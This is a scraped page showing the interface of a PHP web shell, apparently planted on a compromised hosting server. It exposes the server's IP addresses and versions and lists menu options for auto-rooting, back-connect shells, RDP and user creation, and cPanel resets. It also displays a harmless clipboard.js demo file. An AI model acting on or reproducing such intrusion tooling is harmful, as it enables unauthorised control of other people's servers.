Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.129.195.200
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
micro /
assets /
clip /
demo /
[ HOME SHELL ]
Name
Size
Permission
Action
constructor-node.html
966
B
-rw-r--r--
constructor-nodelist.html
1.03
KB
-rw-r--r--
constructor-selector.html
1.01
KB
-rw-r--r--
function-target.html
975
B
-rw-r--r--
function-text.html
941
B
-rw-r--r--
target-div.html
962
B
-rw-r--r--
target-input-number.html
895
B
-rw-r--r--
target-input.html
890
B
-rw-r--r--
target-programmatic-copy.html
724
B
-rw-r--r--
target-programmatic-cut.html
712
B
-rw-r--r--
target-textarea.html
985
B
-rw-r--r--
text-programmatic-copy.html
657
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : text-programmatic-copy.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>text-programmatic-copy</title> <meta name="viewport" content="width=device-width, initial-scale=1" /> </head> <body> <!-- 1. Define some markup --> <button id="btn"> Copy </button> <!-- 2. Include library --> <script src="../dist/clipboard.min.js"></script> <!-- 3. Instantiate clipboard --> <script> var btn = document.querySelector('#btn'); btn.addEventListener('click', () => { const textCopied = ClipboardJS.copy('123'); console.log('copied!', textCopied); }) </script> </body> </html>
Close